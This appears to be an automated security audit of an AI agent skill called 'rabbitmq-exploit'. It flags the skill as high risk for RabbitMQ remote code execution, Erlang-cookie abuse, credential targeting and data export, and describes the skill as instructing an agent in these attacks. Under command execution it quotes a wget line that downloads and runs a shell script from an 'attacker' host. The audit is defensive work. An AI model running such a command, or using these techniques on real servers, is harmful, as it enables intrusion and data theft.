rabbitmq-exploit
Fail
Audited by Gen Agent Trust Hub on Apr 22, 2026
Risk Level: HIGHREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONDATA_EXFILTRATIONCREDENTIALS_UNSAFEEXTERNAL_DOWNLOADS
Full Analysis
- [REMOTE_CODE_EXECUTION]: The skill provides comprehensive instructions and code for multiple RCE vectors.
references/spring-amqp-rce.mdcontains a full Java implementation for CVE-2023-34050, including gadget chains (POJONode,TemplatesImpl) to execute arbitrary code.references/erlang-cookie-rce.mddetails how to use a leaked Erlang cookie to connect to a remote node and execute system commands viaos:cmd(). - [COMMAND_EXECUTION]: Several references provide shell commands and scripts for unauthorized access.
references/erlang-cookie-rce.mdexplicitly lists commands to download and execute remote shell scripts (e.g.,wget http://attacker/shell.sh -O /tmp/shell.sh && sh /tmp/shell.sh). The skill also includes Python scripts (detection-script.md,management-api.md) that usesocketandrequeststo perform network probing and exploitation. - [DATA_EXFILTRATION]: Instructions in
references/management-api.mddescribe how to export sensitive server configurations via the/api/definitionsendpoint, enumerate user accounts, and extract messages directly from queues without authorization. - [CREDENTIALS_UNSAFE]: The skill identifies and targets highly sensitive credentials. It specifically instructs the agent on how to locate the
.erlang.cookiefile across different operating systems and uses it to gain full node access. It also systematically tests for default administrative credentials likeguest/guest. - [EXTERNAL_DOWNLOADS]: The skill provides commands to download and execute scripts from external, untrusted sources (e.g.,
http://attacker/shell.sh) to facilitate remote access and payload execution on target systems.
Recommendations
- AI detected serious security threats
Audit Metadata